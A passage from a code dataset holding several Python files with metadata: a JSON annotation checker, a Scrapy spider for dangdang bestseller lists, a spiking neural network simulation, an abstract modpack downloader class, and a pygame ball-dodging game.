"pt": "12", "api": [{"api_name": "neutron.tests.tools.SafeFixture", "line_number": 23, "usage_type": "attribute"}, {"api_name": "neutron.tests.tools", "line_number": 23, "usage_type": "name"}, {"api_name": "neutron.tests.tools.SafeFixture", "line_number": 42, "usage_type": "attribute"}, {"api_name": "neutron.tests.tools", "line_number": 42, "usage_type": "name"}, {"api_name": "testscenarios.WithScenarios", "line_number": 52, "usage_type": "attribute"}, {"api_name": "neutron.tests.base.BaseTestCase", "line_number": 52, "usage_type": "attribute"}, {"api_name": "neutron.tests.base", "line_number": 52, "usage_type": "name"}, {"api_name": "fixtures.Fixture", "line_number": 61, "usage_type": "call"}]} {"seq_id": "17688858", "text": "import json\nimport os.path as osp\nimport sys\n\nids = list()\n\nfor line in open(osp.join('/home/wynmew/workspace/Data', 'trainSet')):\n ids.append(('/home/wynmew/workspace/Data', line.strip()))\n\nfor index in range(len(ids)-1):\n img_id = ids[index]\n annofile = osp.join(img_id[0], img_id[1]).replace(\"images\", \"annotations\").replace('.jpg', '.json')\n with open(annofile) as datafile:\n AnnoData = json.load(datafile)\n #print(annofile)\n # print(AnnoData)\n try:\n label=AnnoData[\"annotations\"][0][\"name\"]\n except:\n print(annofile)", "sub_path": "jsonchecker.py", "file_name": "jsonchecker.py", "file_ext": "py", "file_size_in_byte": 566, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "os.path.join", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "name"}, {"api_name": "json.load", "line_number": 14, "usage_type": "call"}]} {"seq_id": "64046410", "text": "# -*- coding: utf-8 -*-\nimport scrapy\nfrom dangdang.items import DangdangItem\n\nclass DangSpider(scrapy.Spider):\n name = 'dang'\n allowed_domains = ['bang.dangdang.com']\n start_urls = ['http://bang.dangdang.com/']\n\n def start_requests(self):\n base_url = 'http://bang.dangdang.com/books/bestsellers/01.00.00.00.00.00-month-2020-5-1-1'\n for i in range(1,3):\n url = base_url.replace(base_url[-1],str(i))\n yield scrapy.Request(url,self.parse)\n\n def parse(self, response):\n data_list = response.xpath('//ul[contains(@class,\"bang_list_mode\")]/li')\n for data in data_list:\n item = DangdangItem()\n item['ranking'] = data.xpath('./div[contains(@class,\"list_num\")]/text()').extract_first()\n item[\"book_name\"] = data.xpath('./div[@class=\"name\"]/a/text()').extract_first()\n item[\"pic_url\"] = data.xpath('./div[@class=\"pic\"]/a/@href').extract_first()\n item[\"comment_num\"] = data.xpath('./div[@class=\"star\"]/a/text()').extract_first()\n item[\"publisher_time\"] = data.xpath('./div[@class=\"publisher_info\"][2]/span/text()').extract_first()\n item[\"publisher_name\"] = data.xpath('./div[@class=\"publisher_info\"][2]/a/text()').extract_first()\n item['price'] = data.xpath('./div[@class=\"price\"]/p[1]/span[1]/text()').extract_first()\n yield item\n", "sub_path": "爬虫框架scrapy相关/dangdang/dangdang/spiders/dang.py", "file_name": "dang.py", "file_ext": "py", "file_size_in_byte": 1385, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "scrapy.Spider", "line_number": 5, "usage_type": "attribute"}, {"api_name": "scrapy.Request", "line_number": 14, "usage_type": "call"}, {"api_name": "dangdang.items.DangdangItem", "line_number": 19, "usage_type": "call"}]} {"seq_id": "537352290", "text": "import numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sympy.solvers import solve\nfrom sympy import Symbol\nfrom matplotlib import patches\nimport matplotlib.patches as mpatches\nimport scipy.io as sio\n\n# plotting configuration\nratio = 1.5\nfigure_len, figure_width = 15*ratio, 12*ratio\nfont_size_1, font_size_2 = 36*ratio, 36*ratio\nlegend_size = 18*ratio\nline_width, tick_len = 3*ratio, 10*ratio\nmarker_size = 15\nplot_line_width = 5*ratio\nhfont = {'fontname': 'Arial'}\n\nsns.set(style='ticks')\n\n# simulation setup\ndt = 0.0001\nn_sec = 6\nT = int(n_sec/dt)\n\n# neuronal parameters\ntau_e, tau_i = 0.020, 0.010\n\n# network parameters\nn_exc, n_inh = 400, 100\n\n# network connectivity\nJ = np.zeros((n_exc+n_inh, n_exc+n_inh))\nJ[:n_exc, :n_exc] = 0.05\nJ[n_exc:, :n_exc] = 0.02\nJ[:n_exc, n_exc:] = 0.05\nJ[n_exc:, n_exc:] = 0.03\n\nmask = np.random.choice([0, 1], size=(n_exc+n_inh, n_exc+n_inh), p=[0.8, 0.2])\nJ = np.multiply(J, mask)\nnp.fill_diagonal(J, 0)\nsio.savemat('data/spiking_neural_network/Fig_6S_Spiking_neural_networks_connectivity_matrix.mat', mdict={'connectivity_matrix':J})\n\n# membrane dynamics\nv_exc = 0.000 # e reversal potential\nv_rest = -0.070 # resting potential\nv_inh = -0.080 # i reversal potential\ntau_m_e = 0.020 # e membrane time constant\ntau_m_i = 0.010 # i membrane time constant\n\n# receptors\ntau_ampa = 0.005 # time constant for ampa\ntau_gaba = 0.010 # time constant for gaba\ntau_nmda = 0.100 # time constant for nmda\nalpha = 0.5 # weights for ampa and nmda, determine the overall exc conductance\n\n# firing threshold\nv_thr = np.ones(n_exc+n_inh) * (-0.050) # firing threshold\nv_spike_rest = -0.07 # resetting membrane potential after spike\nt_ref = 0.003 # refractory period\nt_allow_spike = np.zeros(n_exc+n_inh) # allowed spike timing\n\n# conductance based synapse\nv = np.ones(n_exc+n_inh) * (-0.070) # membrane potential\ng_inh = np.zeros(n_exc+n_inh) # inhibitory conductance\ng_ampa = np.zeros(n_exc+n_inh) # ampa conductance\ng_nmda = np.zeros(n_exc+n_inh) # nmda conductance\ng_exc = np.zeros(n_exc+n_inh) # exc conductance\n\ng_ext = np.zeros(n_exc+n_inh)\npre_spike_time = -100 * np.ones(n_exc+n_inh) # last spike timing\nt_allow_spike = np.zeros(n_exc+n_inh) # last spike timing\nb_last_spike = np.zeros(n_exc+n_inh)\n\nspike_mat = np.zeros((n_exc+n_inh, 10000))\nspike_mat_total = np.zeros((n_exc+n_inh, 60000))\nfr = np.zeros(n_exc+n_inh)\nfiring_mat = np.zeros((n_exc+n_inh, n_sec))\nidx = 0\nfr_idx = 0\n\nu_s = 0.2\ntau_x = 0.20\nx = np.ones((n_exc, n_exc))\n\nJ_EE = np.copy(J[:n_exc, :n_exc])\n\nfor i in range(T):\n t = dt * i\n t_prev = dt * (i - 1)\n if 20000 < i < 40000:\n g_e, g_i = 90, 30\n else:\n g_e, g_i = 30, 30\n\n g_ext[:n_exc] = np.random.random(n_exc) < (g_e*dt)\n g_ext[n_exc:] = np.random.random(n_inh) < (g_i*dt)\n\n # update recurrent input\n b_last_spike = (pre_spike_time == t_prev) # boolean indicate whether neurons spiked at last time step\n\n # E-E short-term plasticty\n x = x - u_s * x * np.tile(b_last_spike[:n_exc], (n_exc, 1))\n x = x * (x >= 0)\n x = x * (x <= 1)\n x = x + (1-x)/tau_x * dt\n x = x * (x >= 0)\n x = x * (x <= 1)\n\n J[:n_exc, :n_exc] = J_EE * x\n\n exc_input = np.dot(J[:, :n_exc], b_last_spike[:n_exc])\n inh_input = np.dot(J[:, n_exc:], b_last_spike[n_exc:])\n exc_input = exc_input + g_ext\n\n # update conductance\n g_inh = g_inh + (-g_inh / float(tau_gaba)) * dt + inh_input\n g_ampa = g_ampa + (-g_ampa / float(tau_ampa)) * dt + exc_input\n g_nmda = g_nmda + ((-g_nmda + g_ampa) / float(tau_nmda)) * dt\n g_exc = alpha * g_ampa + (1 - alpha) * g_nmda\n\n # seperate inhibitory and excitatory\n v[:n_exc] = v[:n_exc] + ((v_rest - v[:n_exc]) + g_exc[:n_exc] * (v_exc - v[:n_exc]) + g_inh[:n_exc] * (v_inh - v[:n_exc])) / float(tau_m_e) * dt\n v[n_exc:] = v[n_exc:] + ((v_rest - v[n_exc:]) + g_exc[n_exc:] * (v_exc - v[n_exc:]) + g_inh[n_exc:] * (v_inh - v[n_exc:])) / float(tau_m_i) * dt\n\n spike_info = (v > v_thr) & (t > t_allow_spike)\n spike_neuron_idx = np.where(spike_info)[0]\n spike_neuron_exc_idx = set(np.arange(0, n_exc, 1)).intersection(spike_neuron_idx)\n spike_neuron_inh_idx = set(np.arange(n_exc, n_exc+n_inh, 1)).intersection(spike_neuron_idx)\n pre_spike_time[spike_neuron_idx] = t\n t_allow_spike[spike_neuron_idx] = t + t_ref\n v[spike_neuron_idx] = v_spike_rest # reset membrane potential\n\n spike_mat[:, idx] = b_last_spike\n idx += 1\n if (i+1)%10000==0:\n fr_idx = int((i+1)/10000)-1\n plt.figure(figsize=(figure_len, figure_width))\n ax = plt.gca()\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['bottom'].set_visible(True)\n ax.spines['left'].set_visible(True)\n for axis in ['top', 'bottom', 'left', 'right']:\n ax.spines[axis].set_linewidth(line_width)\n plt.tick_params(width=line_width, length=tick_len)\n\n for i in range(n_exc+n_inh):\n spike_bins = np.where(spike_mat[i, :] != 0)[0]\n if i < n_exc:\n plt.plot(spike_bins, np.ones(len(spike_bins))*i, 'bo', markersize=5) # excitatory neurons\n else:\n plt.plot(spike_bins, np.ones(len(spike_bins))*i, 'ro', markersize=5)\n\n spike_mat_total[:, fr_idx*10000:(fr_idx+1)*10000] = spike_mat\n fr = np.sum(spike_mat, 1)\n firing_mat[:, fr_idx] = np.copy(fr)\n plt.xticks(np.arange(0, 10000 + 2000, 2000), [0, 0.2, 0.4, 0.6, 0.8, 1.0], fontsize=font_size_1, **hfont)\n plt.yticks(np.arange(0, 500+50, 100), fontsize=font_size_1, **hfont)\n plt.xlabel('Time (s)', fontsize=font_size_1, **hfont)\n plt.ylabel('Neurons', fontsize=font_size_1, **hfont)\n plt.xlim([0, 10000])\n plt.ylim([0, 500])\n plt.savefig('paper_figures/png/Fig_6S_Spiking_neural_networks_EE_STP_' + str(int(t)) + '.png')\n sio.savemat('data/spiking_neural_network/Fig_6S_Spiking_neural_networks_EE_STP_' + str(int(t)) + '.mat', mdict={'spike_mat': spike_mat})\n spike_mat = np.zeros((n_exc+n_inh, 10000))\n idx = 0\n\nplt.figure(figsize=(figure_len, figure_width))\nax = plt.gca()\nax.spines['top'].set_visible(False)\nax.spines['right'].set_visible(False)\nax.spines['bottom'].set_visible(True)\nax.spines['left'].set_visible(True)\nfor axis in ['top', 'bottom', 'left', 'right']:\n ax.spines[axis].set_linewidth(line_width)\nplt.tick_params(width=line_width, length=tick_len)\n\nfor i in range(n_exc + n_inh):\n spike_bins = np.where(spike_mat_total[i, :] != 0)[0]\n if i < n_exc:\n plt.plot(spike_bins, np.ones(len(spike_bins)) * i, 'bo', markersize=2) # excitatory neurons\n else:\n plt.plot(spike_bins, np.ones(len(spike_bins)) * i, 'ro', markersize=2)\n\nplt.xticks(np.arange(0, 60000 + 10000, 20000), [0, 2, 4, 6], fontsize=font_size_1, **hfont)\nplt.yticks(np.arange(0, 500 + 50, 100), fontsize=font_size_1, **hfont)\nplt.xlabel('Time (s)', fontsize=font_size_1, **hfont)\nplt.ylabel('Neurons', fontsize=font_size_1, **hfont)\nplt.xlim([0, 60000])\nplt.ylim([0, 500])\nplt.savefig('paper_figures/png/Fig_6S_Spiking_neural_networks_EE_STP_total.png')", "sub_path": "src/Fig_6S_Spiking_neural_networks_2D_EE_STP.py", "file_name": "Fig_6S_Spiking_neural_networks_2D_EE_STP.py", "file_ext": "py", "file_size_in_byte": 7113, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "seaborn.set", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.multiply", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.fill_diagonal", "line_number": 42, "usage_type": "call"}, {"api_name": "scipy.io.savemat", "line_number": 43, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 43, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 97, "usage_type": "attribute"}, {"api_name": "numpy.random.random", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 98, "usage_type": "attribute"}, {"api_name": "numpy.tile", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 139, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tick_params", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 147, "usage_type": "name"}, {"api_name": "numpy.where", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 152, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 154, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 158, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 160, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 164, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 164, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "scipy.io.savemat", "line_number": 166, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 166, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 170, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 170, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 171, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 171, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tick_params", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "numpy.where", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 185, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 188, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 188, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 188, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 189, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 189, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 190, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 190, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 191, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 192, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 192, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 193, "usage_type": "name"}]} {"seq_id": "244304794", "text": "from abc import ABC, abstractmethod\nimport os\nimport urllib.request\nimport io\nimport os\n\nclass AbstractModpack(ABC):\n __slots__=('title','description')\n @abstractmethod\n def __init__(self, slug, title, summary, description):\n self.slug = slug\n self.title = title\n self.summary = summary\n self.description = description\n self._on_disk_path = os.path.expanduser('~/.local/share/minefish/'+slug)\n os.makedirs(self._on_disk_path, exist_ok=True)\n\n def _getimage(self, imagetype):\n \"\"\"\n Read from disk and return an image.\n :param imagetype: should be one of either 'icon' or 'background', but may be any legal filename\n :return: a PIL.Image, if we are able, or None if we are not\n \"\"\"\n try:\n from PIL import Image\n except ImportError:\n return None\n candidates = [x for x in os.listdir(self._on_disk_path) if x.startswith(imagetype+os.path.extsep)]\n if candidates:\n return Image.open(os.path.join(self._on_disk_path, candidates[0]))\n else:\n image_bytes, image_extension = self._get_image_bytes(imagetype)\n if not image_bytes:\n return None\n image = Image.open(io.BytesIO(image_bytes)) # if this fails we shouldn't be saving it to disk anyway.\n if image_extension:\n with open(os.path.join(self._on_disk_path, imagetype+os.path.extsep+image_extension), 'wb') as f:\n f.write(image_bytes)\n return image\n\n @abstractmethod\n def _get_image_bytes(self, image_type):\n \"\"\"Return a 2-tuple of a bytes object containing the contents of an image file, which will be written to disk\n by the caller, and a file extension without the leading dot. image_type will be one of either \"icon\",\n in which case you should return a small image suitable for displaying next to the modpack name and details in\n the pack list, or \"background\", in which case return a larger image suitable for displaying behind the\n modpack's detailedinfo. In case you cannot return an image, return a 2-tuple (None, None).\n If you do not want the file to be cached to disk (for example, because it was sourced from the executable),\n return a bytes object and None as the extension.\n\n It is up to the implementation to make sense (or not) of alternate values for image_type; the stock UI will\n never call get_image() with anything other than those two values, although third party code may. If you don't\n know what to do, return (None,None).\n \"\"\"\n return (None, None)\n\n\n def download(self, version:str=None):\n \"\"\"\n Download the modpack from whatever server using whatever means you find most suitable.\n :param version: Optional parameter specifying one element from the list returned by getVersionList(),\n or None (or omitted) for the latest version.\n :return: None\n \"\"\"\n pass\n\n @abstractmethod\n def _download(self, version:str=None):\n \"\"\"\n Take a version string and return an iterator in Swordfish CSV format specifying to the downloader what to do.\n The Swordfish CSV format is highly flexible but in case it is insufficient this method may have side effects.\n\n :param version:\n :return: An iterator following the sfpds CSV format.\n \"\"\"\n\n @abstractmethod\n def getVersions(self):\n return []\n\n\n", "sub_path": "swordfish_launcher/downloader/modpack.py", "file_name": "modpack.py", "file_ext": "py", "file_size_in_byte": 3509, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "abc.ABC", "line_number": 7, "usage_type": "name"}, {"api_name": "os.path.expanduser", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 16, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 9, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 30, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 30, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 35, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 35, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 41, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 67, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 77, "usage_type": "name"}]} {"seq_id": "37639442", "text": "# Gello game\n# Created by djengineer 2018-2020\n\nimport pygame\nimport time\nfrom random import randint\n\npygame.init()\npygame.font.init()\nscreenwidth = 1024\nscreenheight = 500\nsize = (screenwidth,screenheight)\nscreen = pygame.display.set_mode(size)\nbgcolor = (255,255,255)\npygame.display.set_caption(\"move and bounce a ball\")\n\n# Initialize variables\n########## initialize all button states ##########\nis_key_pressed = {\"up\" : False,\"down\" : False,\"left\" : False,\"right\" : False}\nfinished = False\nstart = False\nmain_menu = True\ngame_over = False\n\n#initialize functions here\ndef listen_key_press():\n global start\n global main_menu\n global game_over\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n start = not start\n main_menu = not main_menu\n if game_over == True:\n game_over = not game_over\n main_menu = True\n start = False\n if event.key == pygame.K_UP:\n is_key_pressed[\"up\"] = True\n if event.key == pygame.K_DOWN:\n is_key_pressed[\"down\"] = True\n if event.key == pygame.K_LEFT:\n is_key_pressed[\"left\"] = True\n if event.key == pygame.K_RIGHT:\n is_key_pressed[\"right\"] = True\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_UP:\n is_key_pressed[\"up\"] = False\n if event.key == pygame.K_DOWN:\n is_key_pressed[\"down\"] = False\n if event.key == pygame.K_LEFT:\n is_key_pressed[\"left\"] = False\n if event.key == pygame.K_RIGHT:\n is_key_pressed[\"right\"] = False\n\n\n\n#initialize class here\nclass enemy:\n def __init__(self,name,speed,color,position,width):\n self.name = name\n self.speed = speed\n self.color = color\n self.position = position\n self.width = width\n self.direction = self.set_dir()\n def set_dir(self):\n #instead of lists, we use a dictionary here\n move_direction = {\"X\":randint(-self.speed,self.speed),\"Y\":randint(-self.speed,self.speed)}\n while move_direction[\"X\"] == 0 and move_direction[\"Y\"] == 0:\n move_direction = {\"X\":randint(-self.speed,self.speed),\"Y\":randint(-self.speed,self.speed)}\n return move_direction\n def movement_controller(self):\n if self.position[0] < screenwidth and self.position[0] > 0 and self.position[1] < screenheight and self.position[1] > 0:\n self.position[0] += self.direction[\"X\"]\n self.position[1] += self.direction[\"Y\"]\n self.boundary_controller()\n def boundary_controller(self):\n if self.position[0] <= 0: #left screen boundary\n #print(\"Left Bound\")\n self.position[0] += 5\n self.position[1] += 0\n self.direction = self.set_dir()\n if self.position[0] >= screenwidth: #right screen boundary\n #print(\"Right Bound\")\n self.position[0] -= 5\n self.position[1] -= 5\n self.direction = self.set_dir()\n if self.position[1] <= 0: #top screen boundary\n #print(\"Top Bound\")\n self.position[0] += 0\n self.position[1] += 5\n self.direction = self.set_dir()\n if self.position[1] >= screenheight: #bottom screen boundary\n #print(\"Bottom Bound\")\n self.position[0] -= 5\n self.position[1] -= 5\n self.direction = self.set_dir()\n def draw(self):\n pygame.draw.circle(screen,self.color,self.position, self.width, 0)\n def collision_detection(self):\n global game_over\n global start\n #Assuming single player only. Need more loops like enemy ball if more than one player\n #if abs(p1.position[0] - self.position[0] < self.width > 0) and abs(p1.position[1] - self.position[1] < self.width > 0):\n # print(self.name+\" Collide\")\n x = abs(p1.position[0] - self.position[0])\n y = abs(p1.position[1] - self.position[1])\n if x < self.width > 0 and y < self.width > 0:\n #reset coordinate of this collided ball, if not game cannot continue\n #self.position = [randint(0,screenwidth),randint(0,screenheight)]\n self.position = [screenwidth,screenheight]\n game_over = True\n start = False\n def all_play_functions(self):\n self.draw()\n self.movement_controller()\n self.boundary_controller()\n self.collision_detection()\n\n\nclass player:\n def __init__(self,name,position,color,width,speed):\n self.name = name\n self.position = position\n self.color = color\n self.width = width\n self.speed = speed\n def draw(self):\n pygame.draw.circle(screen,self.color,self.position, self.width, 0)\n def ball_movement_controller(self):\n # pygame's position starts from the TOP LEFT of the screen surface at (0,0)\n # X +1 will move it rightwards. How about X -1?\n # Y +1 will move it downwards. How about Y -1?\n # when up key pressed, y-coordinate -1 for as long as the key is pressed.\n if is_key_pressed[\"up\"] == True and self.position[1]>=0:\n self.position[1] -= self.speed\n if is_key_pressed[\"down\"] == True and self.position[1] <= screenheight:\n self.position[1] += self.speed\n if is_key_pressed[\"left\"] == True and self.position[0]>=0:\n self.position[0] -= self.speed\n if is_key_pressed[\"right\"] == True and self.position[0] <= screenwidth:\n self.position[0] += self.speed\n def all_player_functions(self):\n self.draw()\n self.ball_movement_controller()\n \n#load classes here\n#player\np1_ball_pos=[60,70]\np1_ball_color=(60,20,10)\np1_ball_width = 20\np1_ball_speed = 3\np1 = player(\"p1\",p1_ball_pos,p1_ball_color,p1_ball_width,p1_ball_speed)\n#enemy(name,speed,color,position,width,direction)\nenemy_count = 10\nmax_enemy_speed = 1\nenemy_obj_list = []\n\n\n# e1 starts at index 0\nfor x in range(0,enemy_count):\n width = 20\n color = (randint(0,255),randint(0,255),randint(0,255))\n position = [randint(0,screenwidth),randint(0,screenheight)]\n speed = randint(1,max_enemy_speed)\n enemy_obj_list.append(enemy(\"e\"+str(x+1),speed,color,position,width))\n\n\n##### Game Loop #####\nwhile finished == False:\n screen.fill(bgcolor)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n finished = True\n listen_key_press()\n if main_menu == True and start == False:\n headerfont = pygame.font.SysFont(\"monospace\", 30)\n title = headerfont.render(\"Press Space to Start\",1,(0,0,0))\n screen.blit(title,(100,80))\n if start == True and main_menu == False:\n ## Load Enemies in Game Loop\n for enemy in enemy_obj_list:\n enemy.all_play_functions()\n ## Load player 1 in Game Loop\n p1.all_player_functions()\n if game_over == True and start == False:\n headerfont = pygame.font.SysFont(\"monospace\", 30)\n title = headerfont.render(\"Game Over. Press Space to Main Menu.\",1,(0,0,0))\n screen.blit(title,(100,80))\n for enemy in enemy_obj_list:\n enemy.position = [screenheight,screenwidth];\n pygame.display.flip()\nwhile finished == True:\n pygame.quit()\n", "sub_path": "GelloGame.py", "file_name": "GelloGame.py", "file_ext": "py", "file_size_in_byte": 7262, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "pygame.init", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.font.init", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 13, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pygame.K_SPACE", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 42, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 50, "usage_type": "attribute"}, {"api_name": 